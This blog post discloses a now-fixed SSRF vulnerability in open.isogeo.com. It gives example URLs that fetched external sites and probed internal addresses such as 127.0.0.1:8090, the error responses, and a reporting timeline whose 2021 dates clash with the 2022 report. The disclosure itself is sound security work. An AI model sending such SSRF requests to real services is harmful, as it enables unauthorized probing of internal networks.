SSRF found and fixed in open.isogeo.com

A SSFR vulnerability was resolved in open.isogeo.com using the path https://open.isogeo.com/map/schema://url

E.g. this call gave me google France (outside of France)

https://open.isogeo.com/map/https://www.google.com
https://open.isogeo.com/map/http://www.google.com
https://open.isogeo.com/map/www.google.com

Internal access may also have been possible

https://open.isogeo.com/map/127.0.0.1:8090
{"error":{"errno":"EACCES","code":"EACCES","syscall":"connect","address":"127.0.0.1","port":8090}}

https://open.isogeo.com/map/unknownhost
after some timeout:
{"error":{"errno":"ENOTFOUND","code":"ENOTFOUND","syscall":"getaddrinfo","hostname":"unknownhost"}}

Now it’s fixed, response is only:

{"link":"/map"}

Timeline

2022-01-05 Report sent, but I got Your email was rejected due to spam classification.
2022-01-09 Report sent to CERT France
2022-01-12 Response from isogeo about my finding
2021-01-xx Issue was resolved without further reply
2021-02-08 Disclosure as blog post

TL;DR

HowTo vulnerability hunting?
It was an accident ;-)
I searched something different for some opendata web service and found an opendata service in France.
I saw in browser F12 Dev console an URL call for an image, which was no redirect by browser.
https://open.isogeo.com/map/getImage/https://www…….
I catched this SSRF just by copy & paste error without part /getImage/.

Disclaimer

The information provided is released “as is” without warranty of any kind. The publisher disclaims all warranties, either express or implied, including all warranties of merchantability. No responsibility is taken for the correctness of this information. In no event shall the publisher be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if the publisher has been advised of the possibility of such damages.

Written on February 8, 2022 | Last modified on February 8, 2022